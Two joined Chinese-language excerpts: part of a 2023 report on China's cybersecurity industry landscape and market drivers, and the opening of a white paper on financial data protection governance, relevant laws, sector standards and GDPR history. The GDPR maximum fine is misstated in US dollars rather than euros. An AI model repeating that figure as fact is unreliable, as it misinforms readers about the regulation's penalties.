增速为负的一些传统安全产品品类 ,2022年采购热度 降低 ,一些产品做为功能特性与通用型产品融合或被 新品类所替代。 领导者:产业领导者都已成为上市公司,总体资源力和竞争力同步提升。领导者之间 的竞争较为激烈,领导者区间内部也出现分化趋势,未来一段时间将会延续这种竞争 态势。 战略布局者:战略布局者主要是IT龙头、互联网企业,国企等。近两年来国企成为网 络安全行业的重要参与者。国企在政策、资金、资源等方面有着独特的优势,他们的 参与将对市场格局产生重大影响,可能会改变市场竞争的规则和节奏。 成长者:成长者一般已经具备成熟的商业模式和一定规模,业务方向相对聚焦,可能 已上市或正接近上市标准。近年来,与行业领导者的资源和竞争力差距扩大,部分成 长者收入第二增长曲线放缓。如果不能及时找到新的增长动力,他们的市场地位可能 会受到威胁。 创新者:创新者大部分公司成立时间较短,商业模式处于早期阶段。 尽管他们在技术 成熟度和市场营销能力上还有待提高,但他们的潜力和创新能力仍然受到了投资界的 关注。 总的来说,整个市场的格局正在发生变化,领导者与其他角色的差距扩大,战略布局 者持续投入,尤其是国企和运营商的介入可能会带来新的变化。而创新者和成长者将 面临更大的挑战,他们需要在此环境下寻找新的战略路径和增长点。 2023年上半年我国共有3984家公司开展网络安全业务 ,同比 增长22.4%。2023年企业数量增长主要来源服务型企业数量的 上升 ,疫情过去 ,一些企业恢复了服务资质的申请 ,服务型企 业数量同比2022年增长32.5%。 从过去两年来看 ,国内综合型厂商数量基本恢复到2021年的水 平 ,产品型厂商数量近两年持续上升 ,对比2021年增长15.6% , 但服务型厂商数量对比2021年 ,仍然下降25.3%。 安全企业类型包括2类: 1、产品型企业:即具备计算机信息系统安全专用产品销售许可证书 的企业; 2、服务型企业:即具备中国信息安全测评中心或中国网络安全审查 技术与认证中心服务资质证书的企业。 与2022年相比,主要省份安全企业数量均全面上升。 在 TOP10省份中,企业数量增长超过20%的省份有7个,包 括广东、江苏、浙江、四川、福建、湖北、安徽。其中湖 北是新进入TOP10的省份,河南则跌出TOP10。 从分布来看 ,综合型网络安全企业仍主要聚集在北京、长 三角、珠三角和川渝四个区域,其余地区主要仍以服务型 企业为主。 数字经济发展成为网络安全发展的新引擎、新 动力 经历了基础网络安全建设后,数字经济发展成为网络安全 发展的新引擎、新动力,产业迎来新的变革和发展阶段, 催生出更多安全板块。数据安全、云安全、个人隐私保护、 工业互联网安全、物联网安全、 AI 场景下的安全需求、智 慧城市中的交通、能源、医疗等各种智能场景的安全需求, 将成为支撑网络安全市场规模扩容并高速增长的新板块。 2023年2月,中共中央、国务院印发《数字中国建设整体 布局规划》 ,《规划》指出,建设数字中国是数字时代推 进中国式现代化的重要引擎,是构筑国家竞争新优势的有 力支撑。 攻击者利用AI轻易发起网络犯罪,增加了数据和隐私泄露 风险,大模型也更容易受攻击。防御者通过AIGC提升了安 全代码生成和智能研判的效率,利用自然语言理解技术提 取威胁情报 ,缓解了人才缺口,同时提升了客户体验。然 而,AI安全规范的监管已成紧迫问题,同时也带来了新的 市场机遇 ,如AI内容鉴伪和安全评估服务等。 数据成为重要生产要素,数据安全领域保持 快速增长 《数据安全法》《个人信息保护法》标志着数据安全已 上升为国家安全,2022年12月国务院发布《关于构建 更加完善的要素市场化配置体制机制的意见》 ,该意见 把数据纳入了生产要素的范围,并强调把安全贯穿数据 治理全过程。 2023年3月,国家组建国家数据局 ,统筹 推进数字中国、数字经济、数字社会规划和建设,也意 味着步入数据要素开发利用快速且科学的轨道。数据已 经成为了重要的生产要素,而数据安全是保障数据要素 价值的前提。 随着数据要素市场建设的加速,数据安全 领域也将保持快速增长。 政策的顶层设计逐渐完善,筑牢行业发展的政策 基础 2017年6月1日 ,《网络安全法》正式开始施行,为网络安全 立法体系垒筑起了第一块基石;紧跟其后 ,《密码法》、《个 人信息保护法》、《数据安全法》等法律陆续颁布,进入实施 阶段,它们与《网络安全法》共同构成了网络安全立法体系的 支柱框架;随着《关键信息基础设施保护条例》 、《网络安全 审查办法》、《网络产品安全漏洞收集平台备案管理办法》、 《个人信息出境标准合同办法》等一批下位法的落实细化,网 络安全的顶层设计和政策保障正在得到持续夯实和完善,为行 业发展筑牢的政策基础。 信创加速行业渗透,带动网络安全进一步增长 信创产业作为战略性新兴产业,国家不断出台相关政策对 行业的发展进行支持。国务院印发的《“十四五”数字经 济发展规划》中,十四五数字经济发展主要指标明确指出 到2025年行政办公及电子政务系统要全部完成国产化替代。 2022年9月底国资委下发79号文,全面指导国资信创产业 发展和进度。政策要求到2027年央企国企100%完成信创 替代 ,替换范围涵盖芯片、基础软件、操作系统、中间件 等领域。信创加速行业渗透,将带动网络安全进一步快速 增长。 中国网络信息安全市场持续向服务化转型 中国网络信息安全市场持续向服务化转型,与全球安全产业 结构发展趋势保持一致。在网络信息安全产业发展过程中, 大多数是由合规需求驱动的,而近年来的灾难性攻击表明网 络风险是重大威胁,企业开始把安全视为一项重要的商业风 险,并且更看重网络信息安全服务的持续性。随着虚拟化及 云服务理念的渗透,我国网络安全技术趋势出现变化,正由 以硬件交付安全产品,人工交付安全服务的形式,逐步向云 化、 SaaS化方式交付技术和服务等形式转变。
standards
一、概述 (一)发展背景 1.面临挑战,积聚风险 随着信息科技的飞速发展,以数据为核心的数字经济正成为 驱动全球经济增长的新动力。金融领域也是如此,国务院金融稳 定发展委员会的数次会议上均提到要大力发展数字金融, 数字技 术驱动金融业变革和发展已是大势所趋。 数字经济的不断发展, 催生出海量数据。据 IDC 预测1,2025 年全球数据量将高达 175ZB2,其中中国的数据量预计将达 48.6ZB, 占比 27.8%。面对数据量的爆炸式增长,数据来源的日益丰富, 数据类型的不断创新, 金融数据保护治理的广度、深度和难度与 日俱增。金融业主体依据业务运营需要对个人和组织数据的获取、 传递、使用、管理等诸多方面都不断推陈出新。数据在人们的金 融生活中扮演越来越多样的角色,发挥越来越重要的作用。 时至今日,不论是个人支付还是企业贷款,不论是城镇建设 还是国家发展, 不论是货币流通还是进出口贸易,社会生活的方 方面面都流淌着金融数据的“血液”。包括互联网公司在内的泛 金融机构利用自身的平台优势和业务粘性吸附并留存了大量的 个人信息数据, 不时有某某互联网公司数据泄露的新闻见诸报端, 1 IDC,全称 International Data Corporation,是信息技术、电信行业和消费科技市场咨询、顾问和活动服务 专业提供商。 2 ZB 是一种大数据容量存储单位。 对合规监管带来了极大的挑战,安全风险不言而喻。美国 Verizon3公司发布的《2020 年数据泄露调查报告 DBIR》4指出, 55%的数据泄露事件涉及有组织犯罪,30%的数据安全事件源自企 业内部。 (1) 金融数据安全风险的识别难度不断增大 由于“科技赋能金融”的金融科技发展迅速, 不论新技术还 是新场景都催生出新的安全风险。区块链、人工智能等新兴技术 在金融科技领域的快速应用, 疫情、洪灾等公共卫生事件和气象 自然灾害的爆发带来的远程办公需求, 臭名昭著的勒索软件等新 兴攻击技术的持续演化等,内嵌新兴技术的创新应用场景在某种 程度上增大了金融数据安全风险的识别难度,对金融数据保护治 理提出了更高的要求。 (2) 金融数据安全风险的管控复杂度不断增加 金融数据安全概念范畴广泛, 既有私密性又有公共性, 例如 个人金融信息带有强烈的私密属性, 相较而言, 金融监管过程中 收集的数据又具有明显的公共属性。因此,金融数据特有的多重 概念属性增大了金融数据保护治理的复杂度。 (3) 金融数据安全风险的危害程度不断提升 从业务的形态、逻辑和内涵等视角审视, 当下的金融业务具 有纷繁多样、交错关联、复杂深厚等特性,业务产生和涉及的各 3 Verizon 是美国最大的本地电话公司、最大的无线通信公司,全世界最大的印刷黄页和在线黄页信息的提供 商。 4 Verizon 公司自 2008 年以来的第 13 份数据泄露调查报告。透过这份报告可以观察到与数据泄露相关活动的趋 势,许多重要发现和影响不仅适用于 IT 安全,同时也适用于 OT 安全。 类数据在业务内外部交互多、交互过程复杂, 这给数据流转的管 控增加了极大的难度。因此, 金融业务的不断融合创新客观上提 升了金融数据安全风险的危害程度。 综上,金融数据的安全与否所关乎的利益愈发的纷繁复杂, 带来的影响愈发地长久深远。金融数据生命周期的链条串起的数 据流转节点上, 每一家金融主体、每一位个体、每一个监管实体 既是数字金融的受益者, 也是金融风险的责任人与应对挑战的参 战方。 金融数据保护治理需依靠全面科学的框架规范、准确合理的 技术手段、完整有效的落实方式,才能不断应对挑战, 化解风险。 2021 年 7 月,国家互联网信息办公室发布通知称,某出行 APP 存 在严重违法违规收集使用个人信息问题。依据《中华人民共和国 网络安全法》 5相关规定, 通知应用商店下架某出行 APP,这正是 数据保护治理箭在弦上, 势在必行的体现。 2.数据立法,标准出台 近年来, 随着数据价值提升和数据安全事件频发,社会经济 和国家安全面临严峻的挑战。个人信息泄露、行业间数据外泄等 安全挑战不断发生。因此,全球主要国家和地区先后出台了数据 安全与隐私保护的相关政策与标准,对数据的采集、传输、存储、 使用、删除、销毁等全生命周期管理进行拘束和指引。这些政策 法规的出台, 一方面可以有效确保数据经济的良性发展, 规避伴 5 网络安全法是我国第一部全面规范网络空间安全管理方面问题的基础性法律,自 2017 年 6 月 1 日起施行。 随数据经济发展可能造成的权利纠纷和侵害,破除数据内部潜在 的深层次犯罪基础; 另一方面, 政策法规对数据安全提出了严格 的要求, 对各机构数据保护治理提出了新挑战。 (1) 各国先后出台数据相关政策,加强数据保护 美国分别于 2019 年 12 月和 2020 年 10 月发布了《联邦数据 战略和 2020 年行动计划》 6和《国防部数据战略》 7,阐述了其对 数据在国家经济和安全领域的最新定位, 同时还包括一系列促进 数据发展和保护的战略举措。欧盟在 2018 年 5 月发布了约束极 为严格的《通用数据保护条例》8 (简称“GDPR”),此条例成为 全球各国制定数据保护政策的重要参考, 在一定程度上加速了数 据保护治理领域的发展。2020 年 2 月, 欧盟相继发布了《欧盟数 字化战略》《欧洲数据战略》9和《欧盟人工智能战略》, 表明要 建立数据主权。英国政府于 2020 年 9 月发布了《国家数据战略》, 阐述了数据的作用和保护数据的措施。 (2) 国家不断强化数据定位, 持续推进法制建设 国家对数据在我国经济社会发展中的作用和意义有着高瞻 远瞩的认识。 2017 年 12 月, 习近平总书记在中共中央政治局就 实施国家大数据战略进行的第二次集体学习中提出, “要构建以 6 2019 年 12 月 23 日,美国白宫行政管理和预算办公室(OMB)发布《联邦数据战略与 2020 年行动计划》。 7 2020 年 10 月 8 日,美国国防部发布了首份《数据战略》,宣布要将国防部建设成为“以数据为中心的机 构”。 8 2018 年 5 月正式生效的(General Data Protection Regulation,简称 GDPR)标志着欧盟个人数据保护的力 度升级,前身是欧盟在 1995 年制定的《计算机数据保护法》。 9 2020 年 2 月 19 日,欧盟委员会发布《欧洲数据战略》 (AEuropeanStrategyfordata),该数据战略概述了欧盟 未来五年实现数据经济所需的政策措施和投资策略。 数据为关键要素的数字经济。要切实保障国家数据安全, 要加强 关键信息基础设施安全保护,强化国家关键数据资源保护能力, 增强数据安全预警和溯源能力”。随后,2019 年 10 月, 党的十 九届四中全会审议并通过的《中共中央关于坚持和完善中国特色 社会主义制度、推进国家治理体系和治理能力现代化若干重大问 题的决定》中指出, “健全劳动、资本、土地、知识、技术、管 理、数据等生产要素由市场评价贡献、 按贡献决定报酬的机制。 推进要素市场制度建设, 实现要素价格市场决定、流动自主有序、 配置高效公平。”,首次给出了“数据”作为生产要素的定位。 2020 年 4 月印发的《中共中央国务院关于构建更加完善的要素 市场化配置体制机制的意见》首次将数据定义成为同土地、劳动 力、资本,和技术同等重要的第五大生产要素, 并提出加快培育 数据要素市场的三点意见。同年 5 月印发的《中共中央国务院关 于新时代加快完善社会主义市场经济体制的意见》进一步明确了 加快培育数据要素市场, 建立数据资源管理清单机制, 完善数据 权属界定、开放共享、交易流通等标准和措施, 发挥社会数据资 源价值等。 法律法规层面,全国人大常委会先后出台了《国家安全法》 10 《网络安全法》 11 ,并于 2021 年 6 月的第十三届全国人民代表 大会常务委员会第二十九次会议上通过了《数据安全法》 12,2021 10 2015 年 7 月 1 日,第十二届全国人民代表大会常务委员会第十五次会议通过,中华人民共和国主席令第 29 号 公布《中华人民共和国国家安全法》 (简称《国家安全法》),自公布之日起施行。 11 《中华人民共和国网络安全法》 (简称《网络安全法》)是我国第一部全面规范网络空间安全管理方面问题的基 础性法律, 自 2017 年 6 月 1 日起施行。 12 《中华人民共和国数据安全法》 (简称《数据安全法》),自 2021 年 9 月 1 日起施行。 年 8 月历经三次审议的《中华人民共和国个人信息保护法》 (以 下简称“个人信息保护法”) 获十三届全国人大常委会第三十次 会议表决通过。这四部法律共同构成了我国整体数据保护体系的 顶层设计。 (3) 金融数据关系国计民生, 监管要求日臻清晰 金融数据保护方面, 在数次会议上都提到金融基础设施、金 融安全、金融数据保护治理、金融科技监管之间的交错关系, 强 调了在国家总体部署下, 金融监管部门对金融数据保护治理的守 土责任。为此, 中国人民银行、银保监会、证监会等金融监管部 门先后出台了一系列关于金融数据治理与安全的法规、意见和标 准。 2018 年 5 月, 原银保监会发布《银行业金融机构数据治理 指引》 13。2018 年 9 月, 中国证监会发布了《证券期货业数据分 类分级指引》 14 《证券期货业机构内部企业服务总线实施规范》15 《期货市场客户开户数据接口》 16 《证券发行人行为信息内容格 式》17等四项金融数据标准。中国人民银行分别于 2020 年 2 月至 2021 年 4 月期间,发布了《个人金融信息保护技术规范》18 《金 融数据安全 数据分级指南》19 《多方安全计算金融应用规范》20、 13 2018 年 5 月,原银保监会发布《银行业金融机构数据治理指引》 ,为商业银行搭建完善的数据治理体系提供 了指引。 14 《证券期货业数据分类分级指引》(JR/T 0158-2018) 15 《证券期货业机构内部企业服务总线实施规范》(JR/T 0159-2018) 16 《期货市场客户开户数据接口》(JR/T 0160-2018) 17 《证券发行人行为信息内容格式》(JR/T 0163-2018) 18 《个人金融信息保护技术规范》(JR/T 0171—2020) 19 《金融数据安全 数据分级指南》(JR/T 0197—2020) 20 《多方安全计算金融应用规范》(JR/T 0196—2020) 《金融业数据能力建设指引》21和《金融数据安全 数据生命周期 安全规范》 22等多部金融数据保护领域的技术标准。金融监管部 门结合各自金融业务特点从金融数据保护治理的多个角度对涉 及金融数据保护的诸多方面出台了具体标准,并且仍在不断丰富 和完善中。 政策的出台,一方面为金融业各方指明了金融数据应用的方 向和边界,另一方面有效保护了金融数据权属主体的合法权益, 对数据治理提出了新的要求。监管日渐趋严的内外部环境下, 有 必要对金融数据保护治理的要求进行梳理明晰, 对数据保护治理 的方式方法进行剖析论证,为管理、维护、使用金融数据的上下 游机构和企业, 推出符合当前政策要求和应用实际的金融数据保 护治理体系建设策略。 (二)发展现状 1.分类分级是数据保护治理基础 国家十四五规划和 2035 年远景目标建议中明确提出“加快 数字化发展”,并强调了完善数据分类分级保护制度, 制定数据 隐私保护和安全审查制度,加强政务数据、企业商业秘密和个人 信息保护的重要性。 《数据安全法》一审稿对地方、部门制定重要数据目录做了 规定。经宪法和法律委员会研究,建议在二审稿相关条款中规定, 21 《金融业数据能力建设指引》 (JR/T0218—2021) 22 《金融数据安全 数据生命周期安全规范》 (JR/T 0223-2021) 国家建立数据分类分级保护制度,确定重要数据目录, 加强对重 要数据的保护;各地区、各部门按照规定确定本地区、本部门, 以及相关行业、领域的重要数据具体目录。在法律层面,国家已 将分类分级作为数据保护治理的基础性要求,从强调重点管理提 升为体系化管理。 金融行业是数据密集型行业,金融数据作为生产要素的价值 日益凸显。同时,金融业相关机构和实体存在数据质量不高、数 据使用不当、数据保护不周、数据流转不畅等问题。金融数据内 涵丰富, 种类繁多, 金融数据分类分级工作的开展过程实际上是 金融业机构按照一定标准对其所拥有的数据资产进行梳理的过 程。《个人信息保护法》将生物识别、宗教信仰、特定身份、医 疗健康、金融账户、行踪轨迹等信息列为敏感个人信息。《金融 数据安全 数据安全分级指南》特别强调金融业机构应高度重视 个人金融信息相关数据, 在数据安全定级过程中从高考虑。不仅 是国家法律和行业规范对数据分类分级提出相关要求, 随着数据 分类分级制度构建不断深化,越来越多的文件开始探索数据分类 分级具体标准的明确, 证监会于 2018 年 9 月 27 日发布的《证券 期货业数据分类分级指引》(JR/T 0158-2018)、中国人民银行 于 2020 年 2 月 13 日发布的《个人金融信息保护技术规范》(JR/T 0171-2020)及工信部于 2020 年 2 月 27 日发布的《工业数据分 类分级指南(试行) 》、 2020 年 9 月 28 日, 中国人民银行印发 《金融数据安全 数据安全分级指南》(JR/T 0197-2020),根 据金融业机构数据安全性遭受破坏后的影响对象和所造成的影 响程度, 将数据安全级别由高到低划分为五级。因此, 对数据资 产进行梳理并开展数据安全分级是机构开展数据安全管理的起 始点, 是金融机构建立完善数据生命周期保护框架的基础,也是 有的放矢地实施数据安全管理的前提条件。 “安全+利用”是数据治理的共生形态,数据安全是总体国 家安全的重要立足点, 不同的数据类型对国家安全的影响度悬殊。 关系国家安全、国民经济命脉、重要民生、重大公共利益等领域 的数据属于国家核心数据,理应采取更加严格的管理制度进行保 护。 金融行业不仅要遵循国家法律法规的相关要求, 推进数据分 级分类保护体系的落地, 更加需要结合金融业自身特点, 科学合 理的厘定级别和类别的层次和界限,为金融数据保护治理的有效 实施提供坚实基础。 2.个人信息保护是数据保护治理重要方面 2021 年 1 月 1 日, 《中华人民共和国民法典》正式实施, 其 中人格权编设立“隐私权和个人信息保护”专章,是构建数字时 代个人信息和隐私保护的民法基础; 《个人信息保护法》于 2021 年 11 月 1 日起生效实施, 明确不得过度收集个人信息、大数据 杀熟, 对人脸信息等敏感个人信息的处理作出规定, 完善个人信 息保护投诉、举报工作机制等。《个人信息保护法》构建以“告 知-同意”为核心的个人信息处理规则,规范自动化决策中个人 信息处理规则, 赋予个人关于个人信息保护的各项权利, 强化个 人信息处理者的义务,加大对侵犯个人信息行为的惩处力度。 《个人信息保护法》明确了个人信息保护、合法正当诚信、 处理必要、目的特定、知情同意、个体参与、保证质量、公开透 明、安全保障和决策公平等十大原则。该法强调社会各界对待个 人信息应采取必要的保护措施, 并合法、正当、诚信地处理个人 信息。该法同时对个人信息的收集、 处理、保存等作出了严格限 制, 并强调使用个人信息目的的合理性和明确性,以及个体在个 人信息处理中具有的法律地位和拥有的合法权益。 个人信息保护作为金融数据保护的重要组成部分,其核心宗 旨在于对个人意志的尊重,这也是金融数据保护治理的核心要义 之一。金融数据保护治理从广义上讲是为了保障国家金融安全, 从狭义上看,同样与我们每一个公民的信息保护息息相关, 因此, 个人信息保护在金融数据保护治理中承担着个人保护与总体安 全的双重内涵。 3.框架建设是数据保护治理范式 数据保护是我国各行各业信息化建设的薄弱环节,在金融行 业, 生产数据被保护的比例仅有 15%;在政府, 数据被保护的比 例还不到 10%。2021 年全球数据保护指数(GDPI)显示,有 88% 的中国 IT 决策者(全球 82%)担心其现有的数据保护解决方案 无法满足未来所有的业务挑战。在数据治理与隐私保护的政策法 规上进行前瞻性研究,探索确立数据治理与隐私保护的中国原则、 制度与框架,加快形成中国方案,已经刻不容缓。 随着数字经济立法的逐步完善, 以及数据保护技术的全方位 发展, 系统化的数据保护治理框架不断涌现, 逐渐成为各行业数 据保护治理建设实践的有效范式。 数据保护治理是一项复杂的社会工程, 涉及数据公开与隐私 保护的关系、数据共享与数据权属的关系、数据权利与数据公平 的关系, 知识产权与数据产权的关系, 需要找准国家、产业与个 人共赢的立足点。数据保护建设以数据治理体系法治化为基础, 将数据保护技术与数据保护管理融合在一起,综合业务、安全、 网络等多部门多角色的诉求,总结归纳为系统化的思路和方法。 数据保护建设以“让数据使用更安全”为愿景构建方法论, 核心内容包括: (1) 满足数据安全保护、数据使用合规、敏感数据管理 三个需求目标; (2) 核心理念包括: 数据分级分类、保护等级提升、角 色合理授权、使用场景安全; 《数据安全法》对企业的数据处理活动,提出了五项监管 要求:第一,符合基础性的合规要求,包括建立企业数据安全 管理制度,有相应的基础措施和管理措施。第二,对数据做等 级保护, 需要企业做等级保护测评和备案。第三,进行数据分 级分类, 企业要根据分类结果采取相应的管理措施。第四,识 别核心数据和处理数据出境问题,比如年检、年报审计。第 五,管理数据交易中介, 中介要审核双方身份、流程交易记 录、制定审核清单等。 机构对关键业务的业务连续性要求越来越高,热数据的可 靠性面临新挑战。很多机构当前系统数据保护等级低,没有做 到双活或两地三中心保护。《数据保护产业发展宣言》 23指出随 着数据应用场景的不断演进,数据保护的范围越来越广、等级 要求越来越高、数据规模越来越大、保留时间越来越长, 需要 全面提升数据保护的规格并围绕数据生命周期提供全面保护。 (3) 数据保护治理的建设步骤包括: 组织构建、资产梳 理、合规指引、策略制定、过程控制、行为稽核和持续改善 等; 23 2021 年 3 月 30 日发布,呼吁社会提升对数据基础设施灾难保护能力建设关注度,推动数据灾备产业标准建 设。 数据治理是一个有机整体,要在国家战略、法律法规、技术 保障、标准建设、行业自律、企业管理等方面同时发力。监管部 门如何给企业提供更多、更详细的合规指引、操作规范, 提升企 业数据保护和利用的内驱力是关键。 企业通过制定内部规章制度,设置专门的监管部门或监管人 员, 严格保护信息安全。定期开展内部审查, 评估信息保护状况 和安全等级, 自觉遵守道德和法律规范收集和使用数据, 自觉承 担起保护隐私安全的责任,加强企业自律,实现企业自身的长远 发展和市场的健康发展。公众更倾向于把信息提供给信任的企业 帮助企业提高服务质量, 形成良性循环。 (4) 核心实现框架为数据保护的人员组织、数据保护的 策略和流程、数据保护的技术支撑三大部分。 制定有效的数据保护策略,建议:定期进行数据保护就绪性 检查, 既要重视生产数据,也要重视备份数据, 定期做恢复的演 练; 将提升网络弹性列为首要任务, 遭遇攻击不仅会造成业务的 瘫痪,且会被索要高额的赎金。有效的数据保护包括“三不”: 不因异常情况导致数据不能被使用, 不因不可控因素(如数据误 删除、病毒等)导致数据不能被恢复, 不因时间流逝导致数据丢 失不能被访问。 金融数据保护建设框架应秉持“用户授权、最小必要、专事 专用、全程防护”的原则,由于金融数据资产庞大, 涉及的数据 使用方式多样化,数据使用角色繁杂, 金融数据保护治理面临数 据状况梳理、敏感数据访问与管控、数据治理稽核三大挑战。建 设金融数据安全保障体系需“技术”与“管理”并重, 通过技术 手段与管理措施双管齐下,基于数据全生命周期构建数据安全指 标, 借助丰富的数据安全监测及快速响应机制, 通过技术手段构 建金融数据保护治框架, 以实现金融数据全生命周期的信息脱敏、 安全隔离、权限管控, 严防用户数据泄露、篡改和滥用, 确保数 据安全和消费者的隐私保护。 各类数据保护治理系统的建设框架24为数据保护治理的有序 实施提供了不同思路和实践路径。数据保护治理框架建设作为数 据保护治理的范式在金融行业中进行推广是科学保护金融数据 的有效路径。 4.标准与技术研究是数据保护治理趋势 信息技术的飞速发展和迭代裹挟着数据利用和数据保护的 “矛与盾”技术不断翻新,倒逼强数据行业持续地开展数据保护 技术研究。研究成果的标准化又确保最新的数据保护治理理念和 措施能够在行业内统一落地见效。 《数据安全法》明确了国家坚持“维护数据安全”与“促进 数据开发利用”并重的立法与监管理念。工业和电信行业急需从 基础性制度层面,加快构建适应行业安全挑战特点的数据安全管 理体系。2021 年 9 月 30 日, 《工业和信息化领域数据安全管理 24 详见第三章节数据保护治理框架简要介绍 办法(试行) 》(以下简称《管理办法》) 面向社会公开征求意 见。 《管理办法》拟通过建立完善数据分类分级、监测预警与应 急管理、数据全生命周期安全管理等制度机制, 实施重要数据和 核心数据的重点保护,提升数据安全风险事前感知和事后处置能 力, 加强数据处理活动流程性安全管理。敏感数据识别发现技术 正向智能化发展,主流数据安全厂商通过算法的创新、融合等手 段提升敏感数据的识别能力和精度,并利用人工智能技术实现自 动化, 现在很多敏感数据的识别都可以通过人工智能和机器学习 技术提供实施。 2020 年 8 月,工信部曾公开征求对《电信和互联网行业数 据安全标准体系建设指南(征求意见稿) 》的意见。征求意见稿 表示,在基础共性标准、关键技术标准、安全管理标准的基础上, 结合新一代信息通信技术发展情况, 重点在 5G、移动互联网、车 联网、物联网、工业互联网、云计算、大数据、人工智能、区块 链等重点领域进行布局, 并结合行业发展情况, 逐步覆盖其他重 要领域。结合重点领域自身发展情况和数据安全保护需求,制定 相关数据安全标准。 到 2023 年,工信部计划研制数据安全行业 标准 50 项以上, 健全完善的电信和互联网行业数据安全标准体 系, 标准的技术水平、应用效果和国际化程度显著提高, 有力支 撑行业数据安全保护能力提升。 2021 年 7 月 1 日,《数据安全治理能力评估方法》正式实 施, 提出了数据保护治理能力评估的框架,规定了数据保护治理 能力的框架, 从组织建设、制度流程、技术工具、人员能力等四 个维度定义了 18 个能力项的评估方法,覆盖数据保护治理的全 生命周期。原银保监会 2021 年 9 月 23 日发布《商业银行监管评 级办法》,对银行监管评级体系进行了全面升级, 将“数据治理” 及“机构差异化”两项全新要素纳入了评价体系。 除了法规政策以及监管机制的不断完善,数据安全产业生 态建设也正在稳步推进。 2020 年 12 月四部门印发《关于加快构 建全国一体化大数据中心协同创新体系的指导意见》, 到 2025 年, 全国范围内数据中心形成布局合理、绿色集约的基础设施一 体化格局。强化大数据安全防护,推动核心技术突破及应用。围 绕服务器芯片、云操作系统、云数据库、中间件、分布式计算与 存储、数据流通模型等环节,加强对关键技术产品的研发支持。 鼓励 IT 设备制造商、数据中心和云服务提供商、数字化转型企 业等产业力量联合攻关, 加快科技创新突破和安全可靠产品应用。 同时,政府积极促进企业数据安全产品和解决方案在行业场 景和新基建中的应用落地。在政务、金融、交通、医疗等各行各 业数据安全防护都在逐渐得到广泛应用。我国各部门组织针对数 据安全问题, 正通过设立相关学科与研究院、设立培训考核等方 式, 大力加强数据安全人才队伍建设。伴随着国家对数据安全的 重视,和数据安全以及网络安全相关的企业这两年来也呈现爆发 式增长。 10 月 12 日 IDC 发布《2021 上半年中国 IT 安全服务市 场跟踪报告》显示, 2021 上半年中国 IT 安全服务市场厂商整体 收入约为 11.1 亿美元, 厂商收入规模较去年同期实现翻倍增长, 涨幅高达 110%,较 2019 年同比增长 38%。 金融数据保护治理同样需要秉持标准建设和技术研究两条 腿赶路的稳健方式, 才能不断吸收最新的数据保护治理技术, 并 在标准化范围内扎实推广,实现全行业数据的有序有效保护和治 理。 二、 国内外数据保护政策、法律和标准 (一)国际数据保护政策和法律 1.《通用数据保护条例》(GDPR) 当前,全球已有近 100 个国家和地区制定了个人信息保护的 法律,个人信息保护专项立法已成为国际惯例。欧盟于 2018 年 5 月 25 日正式实施的《通用数据保护条例》(GDPR)被称为是史 上最严的个人信息保护法,成为全球个人数据安全立法中极具标 志性的一部法案。同时,各国的个人信息保护相关法律大多以 GDPR 为蓝本, 我国的《中华人民共和国民法典》与《中华人民共 和国数据安全法》《中华人民共和国个人信息保护法》, 以及多 数国家及行业标准、行政指令等都引用并借鉴了 GDPR 的很多优 秀做法。 (1) GDPR 背景 欧洲个人信息保护的历史最早可以追溯到 1948 年的联合国 《世界人权宣言》25。《宣言》指出“任何人的隐私、家庭、住宅 或通信不应受到任意干涉,也不应受到对其荣誉和名誉的攻击。 人人有权得到法律保护,免遭此类干涉或攻击”。1950 年颁布的 《欧洲人权公约》 26规定:“任何人享有私人、家庭生活及其各 项通信被尊重的权利。”这被认为是欧洲第一代个人信息保护法。 25 26 European European Convention Convention Rights: https://www.echr.coe.int/Documents/Convention_ENG.pdf Rights: https://www.echr.coe.int/Documents/Convention_ENG.pdf 当代的个人信息保护, 包括将隐私作为人权的概念, 源于欧 洲对保护个人免受其起源或特殊性的压迫的重要性的反思。1980 年,经合组织制定的《保护隐私和个人数据越境流动准则》(OECD) 27 ,这是第一个主要的非约束性文本,为现代个人信息保护奠定 了基础。1981 年 1 月 28 日, 欧洲委员会通过了《关于自动处理 个人数据的保护个人的公约》 28 ,被命名为第 108 号公约, 决议 的重点是电子数据库中的个人信息。 1995 年 10 月 24 日,欧洲 议会和理事会发布关于处理个人数据和此类数据自由流动方面 保护个人的 95/46/EC 指令29 (又称 95 指令),该指令有两个目 标: 促进成员国之间的个人数据保护, 以及促进成员国之间的个 人数据自由流动。 (2) GDPR 发布 在上述历史背景下, 《通用数据保护条例》(GDPR)30于 2012 年 1 月由欧盟委员会立法提案,历经四年的审议与修订,于 2016 年 4 月 27 日签署最终法案,2016 年 5 月 25 日生效。经过两年 的宽限期,2018 年 5 月 25 日,《通用数据保护条例》直接适用 于所有成员国和全球其他相关国家。 27 OECD Guidelines on the Protection of Privacy and Transborder Flows of Personal Data (Updated in 2013),https://www.oecd.org/digital/ieconomy/oecdguidelinesontheprotectionofprivacyandtransborderfl owsofpersonaldata.htm 28 The Council of Europe Convention for the Protection of Individuals with regard to Automatic Processing of Personal Data,https://www.coe.int/en/web/conventions/full-list/- /conventions/treaty/108?module=treaty-detail&treatynum=108 29 Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data, https://ec.europa.eu/eip/ageing/standards/ict-and- communication/data/directive-9546ec_en.html 30 General Data Protection Regulation, https://eur- lex.europa.eu/legalcontent/EN/TXT/PDF/?uri=CELEX:32016R0679 GDPR 在《数据保护指令》的基础之上,对各成员国的监督 协调加入了新规定,要求成员国应将 GDPR 与本国法律结合起 来,设立专门负责机构保障其实施。GDPR 旨在保护自然人的基本 权利和自由, 规定了细致的数据主体权利以及数据控制、处理者 义务等具体内容,采取“长臂”管辖原则,对违反条例的行为设 定了高额罚款。 (3) GDPR 的重大影响 尽管 GDPR 是一个区域性法律规范,但是其施行对于各国立 法都有着重要的影响。 (a)数据主体权益保护从被动/事后管理变为预先管控。各 国数据立法主流采纳了 GDPR 的自证清白模式,数据控制者、数 据处理者或共同控制者31需要预先进行隐私设计及影响性评估, 才能做到自证清白。 (b)明确了“数据是什么”,数据是人权的自然延伸部分, 数据的管理等同财产管理。因此全球各国均采取了长臂管辖与高 额处罚: 一是数据是跨境流动的,违反者进行处罚也是跨境实施 的(从“属地主义”到“属人主义”);二是罚款额度是年度全 球营业额 4%或 2000 万美元,以高者为准。 (c)GDPR 合规性成为企业数据治理的考核标准之一。数据 保护影响评估(DPIA))保证数据全生命周期的数据合规遵从高 31 GDPR 中参与主体在数据处理活动中的角色通常包括数据控制者(data controller)、数据处理者(data processor)、共同数据控制者(joint controller)。数据控制者有决定数据处理的目的与方式的权利。数据 